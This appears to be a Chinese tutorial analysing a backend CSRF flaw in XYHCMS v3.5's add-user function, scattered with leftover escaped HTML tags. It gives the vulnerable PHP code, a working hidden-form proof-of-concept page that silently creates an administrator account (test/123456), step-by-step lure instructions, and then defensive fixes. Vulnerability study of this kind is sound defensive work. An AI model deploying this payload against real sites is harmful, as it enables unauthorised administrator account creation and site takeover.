XYHCMS后台CSRF漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>
本文档详细分析XYHCMS v3.5版本中存在的后台CSRF（跨站请求伪造）漏洞，该漏洞存在于添加系统用户的功能模块中，由于缺乏有效的CSRF防护机制，攻击者可构造恶意页面诱骗管理员点击，从而在不知情的情况下添加后台管理员账户。<\/p>

漏洞环境<\/h2>
受影响系统：XYHCMS v3.5（20180518版本）<\/li>
漏洞文件：\/xyhai.php?s=\/Auth\/addUser<\/code><\/li>
请求方式：POST<\/li>
<\/ul>
漏洞分析<\/h2>
1. 代码审计<\/h3>
关键漏洞代码位于添加用户的后台处理逻辑中：<\/p>
public<\/span> function<\/span> addUser<\/span>() {
<\/span><\/span>    if<\/span> (IS_POST<\/span>) {
<\/span><\/span>        \/\/用户组
<\/span><\/span><\/span><\/span>        $group_id =<\/span> I<\/span>('group_id'<\/span>, array<\/span>());
<\/span><\/span>        $department =<\/span> I<\/span>('department'<\/span>, array<\/span>());
<\/span><\/span>        
<\/span><\/span>        \/\/...省略部分验证代码...
<\/span><\/span><\/span><\/span>        
<\/span><\/span>        $validate =<\/span> array<\/span>(
<\/span><\/span>            array<\/span>('username'<\/span>, 'require'<\/span>, '用户名不能为空!'<\/span>),
<\/span><\/span>            array<\/span>('password'<\/span>, 'require'<\/span>, '密码不能为空!'<\/span>),
<\/span><\/span>            array<\/span>('password'<\/span>, '5,20'<\/span>, '密码必须在5到20位之间'<\/span>, 0<\/span>, 'length'<\/span>),
<\/span><\/span>            array<\/span>('username'<\/span>, ''<\/span>, '用户名已经存在!'<\/span>, 0<\/span>, 'unique'<\/span>, 1<\/span>),
<\/span><\/span>        );
<\/span><\/span>        
<\/span><\/span>        $data =<\/span> M<\/span>('Admin'<\/span>);
<\/span><\/span>        if<\/span> (!<\/span>$data-><\/span>validate<\/span>($validate)-><\/span>create<\/span>()) {
<\/span><\/span>            $this-><\/span>error<\/span>($data-><\/span>getError<\/span>());
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        \/\/...省略密码处理代码...
<\/span><\/span><\/span><\/span>        
<\/span><\/span>        if<\/span> ($id =<\/span> $data-><\/span>add<\/span>()) {
<\/span><\/span>            $group_data =<\/span> array<\/span>();
<\/span><\/span>            foreach<\/span> ($group_id as<\/span> $key =><\/span> $val) {
<\/span><\/span>                $group_data[] =<\/span> array<\/span>('uid'<\/span> =><\/span> $id, 'group_id'<\/span> =><\/span> $val);
<\/span><\/span>            }
<\/span><\/span>            $result =<\/span> M<\/span>('AuthGroupAccess'<\/span>)-><\/span>addAll<\/span>($group_data);
<\/span><\/span>            if<\/span> ($result) {
<\/span><\/span>                $this-><\/span>success<\/span>('添加成功'<\/span>, U<\/span>('indexOfUser'<\/span>));
<\/span><\/span>            } else<\/span> {
<\/span><\/span>                $this-><\/span>error<\/span>('权限设置失败|用户添加成功'<\/span>);
<\/span><\/span>            }
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            $this-><\/span>error<\/span>('添加失败'<\/span>);
<\/span><\/span>        }
<\/span><\/span>        exit<\/span>();
<\/span><\/span>    }
<\/span><\/span>    \/\/...省略视图渲染代码...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 漏洞点分析<\/h3>


缺乏CSRF防护机制<\/strong>：<\/p>

代码中没有使用token验证<\/li>
没有验证Referer头<\/li>
没有使用验证码机制<\/li>
<\/ul>
<\/li>

请求处理流程<\/strong>：<\/p>

仅检查IS_POST标志<\/li>
对输入数据仅做基本验证（用户名、密码格式等）<\/li>
没有验证请求来源是否合法<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用<\/h2>
1. 构造恶意HTML页面<\/h3>
<html<\/span>>
<\/span><\/span><!-- CSRF PoC - generated by Burp Suite Professional --><\/span>
<\/span><\/span><body<\/span>>
<\/span><\/span><script<\/span>>history<\/span>.pushState<\/span>(''<\/span>, ''<\/span>, '\/'<\/span>)<\/script<\/span>>
<\/span><\/span><form<\/span> action<\/span>=<\/span>"http:\/\/127.0.0.1\/daimashenji\/xyhcms_v3.5_20180518\/xyhai.php?s=\/Auth\/addUser"<\/span> method<\/span>=<\/span>"POST"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"username"<\/span> value<\/span>=<\/span>"test"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"password"<\/span> value<\/span>=<\/span>"123456"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"department[]"<\/span> value<\/span>=<\/span>"1"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"department[]"<\/span> value<\/span>=<\/span>"4"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"department[]"<\/span> value<\/span>=<\/span>"3"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"group_id[]"<\/span> value<\/span>=<\/span>"1"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"realname"<\/span> value<\/span>=<\/span>"hello"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"email"<\/span> value<\/span>=<\/span>"111@qq.com"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"is_lock"<\/span> value<\/span>=<\/span>"0"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"submit"<\/span> value<\/span>=<\/span>"Submit request"<\/span> \/>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>2. 利用步骤<\/h3>

攻击者构造上述HTML页面并托管在任意web服务器<\/li>
诱骗已登录后台的管理员访问该页面<\/li>
页面自动提交表单，在管理员不知情的情况下添加新用户<\/li>
攻击者使用新添加的账户(test\/123456)登录后台<\/li>
<\/ol>
3. 利用效果<\/h3>
成功添加具有管理员权限的新用户：<\/p>

用户名：test<\/li>
密码：123456<\/li>
部门权限：1,4,3<\/li>
用户组权限：1（通常为最高权限组）<\/li>
账户状态：未锁定(0)<\/li>
<\/ul>
防御建议<\/h2>
1. 基础防御措施<\/h3>


添加CSRF Token验证<\/strong>：<\/p>
\/\/ 表单生成时
<\/span><\/span><\/span><\/span><<\/span>input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"__token__"<\/span> value<\/span>=<\/span>"<?php echo session('__token__'); ?>"<\/span>><\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 请求处理时
<\/span><\/span><\/span><\/span>if<\/span> (!<\/span>check_token<\/span>(I<\/span>('__token__'<\/span>))) {
<\/span><\/span>    $this-><\/span>error<\/span>('非法请求'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

验证Referer头<\/strong>：<\/p>
$referer =<\/span> $_SERVER['HTTP_REFERER'<\/span>];
<\/span><\/span>$host =<\/span> $_SERVER['HTTP_HOST'<\/span>];
<\/span><\/span>if<\/span> (strpos<\/span>($referer, $host) ===<\/span> false<\/span>) {
<\/span><\/span>    $this-><\/span>error<\/span>('非法请求来源'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

使用验证码<\/strong>：<\/p>

对敏感操作添加验证码验证<\/li>
<\/ul>
<\/li>
<\/ol>
2. 进阶防御措施<\/h3>


SameSite Cookie属性<\/strong>：<\/p>
session_set_cookie_params<\/span>([
<\/span><\/span>    'samesite'<\/span> =><\/span> 'Strict'<\/span>,
<\/span><\/span>    'secure'<\/span> =><\/span> true<\/span>,
<\/span><\/span>    'httponly'<\/span> =><\/span> true<\/span>
<\/span><\/span>]);
<\/span><\/span><\/code><\/pre><\/li>

双重验证<\/strong>：<\/p>

对敏感操作要求二次密码确认<\/li>
或使用短信\/邮件验证<\/li>
<\/ul>
<\/li>

操作日志记录<\/strong>：<\/p>

记录所有管理员操作，便于审计<\/li>
<\/ul>
<\/li>
<\/ol>
3. 注意事项<\/h3>

使用token时需要配合XSS防御，否则token可能被窃取<\/li>
验证码应使用服务器端会话存储，而非客户端可预测的值<\/li>
防御措施应组合使用，而非单一依赖<\/li>
<\/ul>
总结<\/h2>
该CSRF漏洞源于开发人员对敏感操作缺乏足够的请求来源验证，攻击者可利用此漏洞在管理员不知情的情况下执行添加管理员账户等敏感操作。修复时应采用多层次防御策略，结合token验证、Referer检查等多种机制，同时注意相关防御措施的实现安全性。<\/p>